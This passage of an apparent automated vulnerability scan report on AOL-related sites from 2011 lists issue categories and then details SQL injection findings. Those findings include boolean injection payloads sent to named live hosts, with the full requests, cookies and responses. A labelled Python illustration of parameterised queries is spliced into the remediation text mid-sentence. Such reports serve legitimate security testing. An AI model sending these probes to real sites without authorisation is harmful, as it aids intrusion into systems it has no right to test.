30.159. http://www.tuaw.com/hub/app-reviews

30.160. http://xml.truveo.com/apiv3

30.161. http://yellowpages.aol.com/

31. Cacheable HTTPS response

31.1. https://account.login.aol.com/_cqr/registration/fetchRegImage

31.2. https://api.screenname.aol.com/

31.3. https://maps-api-ssl.google.com/maps

31.4. https://new.aol.com/productsweb/WordVerImage

31.5. https://secure.opinionlab.com/ccc01/comment_card.asp

31.6. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

31.7. https://us.etrade.com/e/t/welcome/whychooseetrade

31.8. https://www.facebook.com/ajax/intl/language_dialog.php

31.9. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

31.10. https://www.fightmagazine.com/mma-magazine/subscribe.asp

31.11. https://www.neodata.com/pub/snew/new_print.shtml

32. HTML does not specify charset

32.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

32.2. http://480-adver-view.c3metrics.com/v.js

32.3. http://abcnews.go.com/Entertainment/popup

32.4. https://account.login.aol.com/_cqr/registration/fetchRegImage

32.5. http://ad.doubleclick.net/clk

32.6. http://ads.pointroll.com/PortalServe/

32.7. http://ads.undertone.com/c

32.8. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

32.9. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

32.10. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php

32.11. http://aol.sportingnews.com/services/sn-promos/snt_promo_spot.php

32.12. http://aol.sportingnews.com/services/sn-promos/yearbooks.php

32.13. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250

32.14. http://browser.cdn.aol.com/customie8/aol/download.html

32.15. http://browsers.aol.com/customfirefox/aol/download.html

32.16. http://browsers.aol.com/customie/aol/download.html

32.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.18. http://cdn.at.atwola.com/_media/uac/tcode3.html

32.19. http://d.xp1.ru4.com/um

32.20. http://eatps.web.aol.com:9000/open_web_adhoc

32.21. http://fantasysource.sportingnews.com/baseball/free

32.22. http://fantasysource.sportingnews.com/baseball/promo

32.23. http://fantasysource.sportingnews.com/baseball/rankings

32.24. http://feedback.aol.com/help/newaolcom/

32.25. http://fls.doubleclick.net/activityi

32.26. http://fonts.citysbest.com/k/uni0vle-e.css

32.27. http://hostedusa3.whoson.com/include.js

32.28. http://image3.pubmatic.com/AdServer/UPug

32.29. http://js.adsonar.com/js/pass.html

32.30. http://legal.aol.com/TOS/

32.31. http://legal.aol.com/copyright-reporting/

32.32. http://mobile.aol.com/supported-carriers/

32.33. http://music.aol.com/_uac/adpage.html

32.34. http://music.aol.com/proxy/promo/

32.35. https://new.aol.com/productsweb/

32.36. https://new.aol.com/productsweb/WordVerAudio.mp3

32.37. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

32.38. http://o.aolcdn.com/art/merge/

32.39. http://o.aolcdn.com/cdn.webmail.aol.com/mailtour/aol/en-us/index.htm

32.40. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

32.41. http://ping.chartbeat.net/ping

32.42. http://pixel.quantserve.com/seg/r

32.43. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

32.44. http://privacy.aol.com/

32.45. http://r.nexac.com/e/getdata.xgi

32.46. http://realestate.aol.com/_uac/adpage.html

32.47. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

32.48. http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png

32.49. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html

32.50. http://toolbar.aol.com/index.adp

32.51. http://top-sec.net/

32.52. http://uac.advertising.com/wrapper/aceUACping.htm

32.53. https://us.etrade.com/e/t/welcome/whychooseetrade

32.54. http://view.c3metrics.com/c3VTabstrct-6-2.php

32.55. http://view.c3metrics.com/v.js

32.56. http://www.aol.com/ads/load_v7.html

32.57. http://www.dailyfinance.com/_uac/adpage.html

32.58. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

32.59. http://www.mapquest.com/cdn/_uac/adpage.htm

32.60. http://www.mmafighting.com/_uac/adpage.html

32.61. https://www.neodata.com/pub/snew/new_print.shtml

32.62. http://www.opselect.com/ad_feedback/survey.adp

32.63. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

33. HTML uses unrecognised charset

33.1. https://secure.opinionlab.com/ccc01/comment_card.asp

33.2. http://top-sec.net/quran/

33.3. http://top-sec.net/vb/

33.4. http://top-sec.net/vb/calendar.php

33.5. http://top-sec.net/vb/external.php

33.6. http://top-sec.net/vb/faq.php

33.7. http://top-sec.net/vb/forumdisplay.php

33.8. http://top-sec.net/vb/index.php

33.9. http://top-sec.net/vb/login.php

33.10. http://top-sec.net/vb/member.php

33.11. http://top-sec.net/vb/memberlist.php

33.12. http://top-sec.net/vb/online.php

33.13. http://top-sec.net/vb/post_thanks.php

33.14. http://top-sec.net/vb/profile.php

33.15. http://top-sec.net/vb/register.php

33.16. http://top-sec.net/vb/search.php

33.17. http://top-sec.net/vb/sendmessage.php

33.18. http://top-sec.net/vb/showgroups.php

33.19. http://top-sec.net/vb/showthread.php

33.20. http://top-sec.net/vb/tags.php

34. Content type incorrectly stated

34.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

34.2. http://480-adver-view.c3metrics.com/v.js

34.3. http://a1.twimg.com/profile_images/278881234/krugman_75_twitter_normal.gif

34.4. http://a1.twimg.com/profile_images/345739587/brand_normal.gif

34.5. http://a12.alphagodaddy.com/

34.6. http://a2.twimg.com/profile_images/254909555/NGTTwit3_normal.gif

34.7. http://a2.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg

34.8. http://a3.twimg.com/profile_images/323333673/twitterProfilePhoto_normal.jpg

34.9. https://account.login.aol.com/_cqr/registration/fetchRegImage

34.10. http://ad.doubleclick.net/clk

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/557100472

34.13. http://ads.pointroll.com/PortalServe/

34.14. http://aka-cdn-ns.adtechus.com/images/445/Ad0St1Sz6Sq0V1Id20183485.jpg

34.15. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

34.16. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

34.17. http://an.tacoda.net/an/

34.18. http://api.screenname.aol.com/auth/getToken

34.19. https://api.screenname.aol.com/auth/getInfo

34.20. https://api.screenname.aol.com/auth/getToken

34.21. https://api.screenname.aol.com/auth/logout

34.22. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

34.23. http://ar.voicefive.com/b/rc.pli

34.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

34.25. http://ct.buzzfeed.com/wd/UserWidget

34.26. http://dev.aol.com/themes/zen/dac_2009/favicon.ico

34.27. http://eatps.web.aol.com:9000/open_web_adhoc

34.28. http://help.aol.com/help/img/vanessa_m_1._account_management

34.29. http://hostedusa3.whoson.com/include.js

34.30. http://image3.pubmatic.com/AdServer/UPug

34.31. http://images.apple.com/global/nav/scripts/globalnav.js

34.32. http://imgs.zinio.com/magimages/500399021/2011/416168844_170.jpg

34.33. http://mobile.aol.com/supported-carriers/

34.34. http://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.35. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.36. http://o.aolcdn.com/art/asylum_men/2009_main_transparent_black

34.37. http://o.aolcdn.com/art/dynanews/advertisement

34.38. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow

34.39. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-lt

34.40. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-rt

34.41. http://o.aolcdn.com/art/dynanews/lbg-photo-icon

34.42. http://o.aolcdn.com/art/merge

34.43. http://o.aolcdn.com/art/merge/

34.44. http://o.aolcdn.com/bill.aol.com

34.45. http://o.aolcdn.com/bill.aol.com/help/help_rev

34.46. http://o.aolcdn.com/bill.aol.com/help/help_rev/images/bubbles_faint_bg.jpg

34.47. http://o.aolcdn.com/billqa.aol.com

34.48. http://o.aolcdn.com/favicon.ico

34.49. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

34.50. http://o.aolcdn.com/os_merge/

34.51. http://o.aolcdn.com/smartbox/SBG/REST/

34.52. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.ttf

34.53. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.woff

34.54. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.eot

34.55. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.ttf

34.56. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.woff

34.57. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.eot

34.58. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.ttf

34.59. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.woff

34.60. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.eot

34.61. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.ttf

34.62. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.woff

34.63. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd

34.64. http://portalblog.aol.com/media/background_new.gif

34.65. http://r.nexac.com/e/getdata.xgi

34.66. http://realestate.search.aol.com/search

34.67. http://search.aol.com/aol/search

34.68. http://search.aol.com/aol/webhome

34.69. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

34.70. http://thumbnails.truveo.com/0019/0E/13/0E1365BA2F9FA0F2C672AB.jpg

34.71. http://thumbnails.truveo.com/0020/0D/02/0D02FB96964419B5B0548A.jpg

34.72. http://thumbnails.truveo.com/0020/65/BD/65BDA59B21148561B976CC.jpg

34.73. http://thumbnails.truveo.com/0020/7B/34/7B34DB70619895BDBA34C0.jpg

34.74. http://thumbnails.truveo.com/0021/53/1E/531E0C1223B27E297B70E5.jpg

34.75. http://thumbnails.truveo.com/0021/5F/D7/5FD79EA05AC04C8AC6F691.jpg

34.76. http://thumbnails.truveo.com/0022/50/81/5081FA28D8EB874CDF4710.jpg

34.77. http://thumbnails.truveo.com/0022/F1/31/F13153246C8EEA834ADD3E.jpg

34.78. http://thumbnails.truveo.com/0023/5E/0F/5E0F7F3A07E50EE46C2AF7.jpg

34.79. http://thumbnails.truveo.com/0023/B4/60/B46071BFD52CDE2AA71695.jpg

34.80. http://toolbar.aol.com/favicon.ico

34.81. http://translate.googleapis.com/translate_a/t

34.82. http://twitter.com/account/available_features

34.83. http://urls.api.twitter.com/1/urls/count.json

34.84. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

34.85. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

34.86. http://view.c3metrics.com/c3VTabstrct-6-2.php

34.87. http://view.c3metrics.com/v.js

34.88. http://www.aol.com/ajax.jsp

34.89. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

34.90. http://www.facebook.com/extern/login_status.php

34.91. http://www.fiddler2.com/fiddler2/updatecheck.asp

34.92. http://www.google.com/buzz/api/button.js

34.93. http://www.huffingtonpost.com/ads/check_flights.php

34.94. http://www.huffingtonpost.com/badge/badges_json_v2.php

34.95. http://www.huffingtonpost.com/include/mod_times.php

34.96. http://www.mapquest.com/_svc/searchio

34.97. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

34.98. http://www.metricstream.com/js/functions_newweb.js

34.99. http://www.metricstream.com/js/functions_web.js

34.100. http://www.res-x.com/ws/r2/Resonance.aspx

34.101. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

35. Content type is not specified

35.1. http://ad.yieldmanager.com/st

35.2. http://widgets.digg.com/buttons/count

35.3. http://www.marketwatch.com/News/Story/Story.aspx

35.4. http://www.metricstream.com/favicon.ico



1. SQL injection
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
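The following is an added illustration, not code from the report or from any of the scanned sites: it replays the scanner's boolean payload pair (`' or 1=1-- ` versus `' or 1=2-- `) against two versions of the same lookup, one built by string concatenation and one using a parameterised query, on an in-memory SQLite table. The table name, columns and rows are constructed for the example and stand in for whatever backend the rankings widget actually uses. It also shows the second reason the remediation text gives for parameterising everything: a legitimate value containing a quote breaks the concatenated query but is handled correctly when bound as a parameter.

```python
import sqlite3

# Constructed sample data (assumed schema, not the site's): one row per
# player per ad dimension.
ROWS = [
    ("180x150", 1, "Player A"),
    ("180x150", 2, "Player B"),
    ("300x250", 1, "Player C"),
    ("728x90", 1, "Player D"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rankings (dimension TEXT, rank INTEGER, player TEXT)")
    conn.executemany("INSERT INTO rankings VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, dimension):
    """Unsafe: the input becomes part of the SQL text, so a quote in the
    value ends the literal and the remainder is parsed as query syntax."""
    sql = "SELECT player FROM rankings WHERE dimension = '" + dimension + "' ORDER BY rank"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, dimension):
    """Safe: the query structure is fixed first; the value is bound as data
    and can never change that structure, whatever characters it contains."""
    sql = "SELECT player FROM rankings WHERE dimension = ? ORDER BY rank"
    return [row[0] for row in conn.execute(sql, (dimension,))]


def differential_probe(lookup):
    """Replay the scanner's 1=1 / 1=2 pair against a lookup function and
    return both result sets plus whether they differ (the scanner's signal)."""
    conn = make_db()
    true_case = sorted(lookup(conn, "180x150' or 1=1-- "))
    false_case = sorted(lookup(conn, "180x150' or 1=2-- "))
    return true_case, false_case, true_case != false_case


def legit_quote_probe():
    """A genuine value containing an apostrophe: the concatenated query
    raises a syntax error, the parameterised one returns the matching row."""
    conn = make_db()
    conn.execute("INSERT INTO rankings VALUES (?, ?, ?)", ("O'Neil", 1, "Player E"))
    try:
        lookup_vulnerable(conn, "O'Neil")
        vulnerable_survived = True
    except sqlite3.OperationalError:
        vulnerable_survived = False
    return vulnerable_survived, lookup_parameterised(conn, "O'Neil")


if __name__ == "__main__":
    print("concatenated :", differential_probe(lookup_vulnerable))
    print("parameterised:", differential_probe(lookup_parameterised))
    print("quote in data:", legit_quote_probe())
```

With concatenation the `1=1` probe returns every row and the `1=2` probe only the intended dimension, which is exactly the response difference the scanner keys on; with the parameterised query both probes return nothing, because the whole payload is compared as a literal dimension string. Note that the `-- ` comment also swallows the `ORDER BY`, which is why the probe sorts its results before comparing.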



1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 01:12:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105496

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>SPORTING NEWS FAN SHOP</h2>
<span><a href="http://www.fanatics.com/partnerid/9938/" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Fan Shop | unit: homepage mast');" target="_blank">Get your favorite team gear</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max-rows="1" width="80" auto
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:12:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105521

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<h2>FANTASY SOURCE BASEBALL</h2>
<span><a href="http://fantasysource.sportingnews.com/baseball/promo?affiliate_code=sn_home" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball - FREE Trial | unit: homepage mast');">Try it for FREE</a></span>
</div>
<!-- breaking news -->
<a href="http://aol.sportingnews.com" class="sn-feed-logo">
<img src="http://st.snimg.com/image/feed/logos/logo_spnews_launch.png" alt="Sporting News Feed Logo">
</a>
<script>
$('form#header-search div.search-icon, form#footer-search div.search-icon').live('click', function(){
$(this).parent().parent().submit();
}).live('mouseover mouseout', function(event){
if (event.type == 'mouseover') {
$(this).addClass('on');
} else {
$(this).removeClass('on');
}
});
</script>
<!-- search -->
<div class="search rounded-corners clearfix">
<form id="header-search" method="get" action="/search">
<fieldset>
<label for="search-box">Find on SN</label>
<input id="search-box" name="search_term" type="text">
<div class="search-icon">Search</div>
</fieldset>
</form>
<div class="follow">
<span class="text">Follow SN</span>
<span class="facebook">
<a target="_blank" title="Sporting News Facebook Page" href="http://www.facebook.com/sportingnews">
Facebook
</a>
</span>
<span class="twitter">
<a target="_blank" title="Sporting News' Twitter Page" target="_blank" href="http://twitter.com/SportingNews">
Twitter
</a>
</span>
</div>
<div class="connect">
<span class="text">Connect with SN</span>
<span class="facebook-connect">
<fb:login-button show-faces="false" max
...[SNIP]...

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The dimension parameter appears to be vulnerable to SQL injection attacks. The payloads 29246186'%20or%201%3d1--%20 and 29246186'%20or%201%3d2--%20 were each submitted in the dimension parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d1--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4594

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=1-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=1-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=1-- ">
<h1>Fantasy Baseball 3B Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnew
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15029246186'%20or%201%3d2--%20&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:15:00 GMT
Cache-Control: max-age=280
Date: Thu, 05 May 2011 01:16:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4605

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
e:11px; color:#000; }
#fs { display:block; width:180px; height:15029246186' or 1=2-- px; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15029246186' or 1=2-- .jpg) no-repeat; }
#fs a, #fs a:visited { color:#004a85; font-weight:bold; text-decoration:none; }
#fs a:hover { color:#000; }
#fs h1 { font-size:17px; font-weight:bold; text-align:center; margin:9px 0; }
#fs table { border-collapse:collapse; border-bottom:1px solid #000; }
#fs th, #fs td { text-align:left; }
#fs th { border-bottom:1px solid #000; padding:0 7px 4px; }
#fs td { padding:4px 7px; border-left:1px solid #000; }
#fs td.rank { width:25px; border:none; text-align:center; }
#fs .more-link { text-align:right; margin:9px 11px 0 0; }
#fs .more-link a { font-size:12px; font-style:italic; font-weight:normal; }
#fs a.fs-logo { display:block; position:absolute; }
#fs.ad-300x250 table { width:280px; margin:0 10px; }
#fs.ad-300x250 a.fs-logo { width:300px; height:70px; top:180px; }
#fs.ad-728x90 h1 { width:220px; float:left; margin:12px 0 0 60px; line-height:1.2em; }
#fs.ad-728x90 h1, #fs.ad-728x90 .more-link a, #fs.ad-728x90 .more-link a:visited { color:#fff; }
#fs.ad-728x90 .more-link { width:220px; position:absolute; top:64px; left:60px; margin:0; text-align:center; }
#fs.ad-728x90 table { position:absolute; width:260px; top:7px; left:275px; }
#fs.ad-728x90 a.fs-logo { width:188px; height:90px; top:0; left:540px; }
#fs.ad-180x150 h1 { font-size:10px; margin:6px 0 2px; }
#fs.ad-180x150 table { width:172px; margin:0 4px; }
#fs.ad-180x150 th { padding:0 3px 3px; }
#fs.ad-180x150 td { padding:3px; }
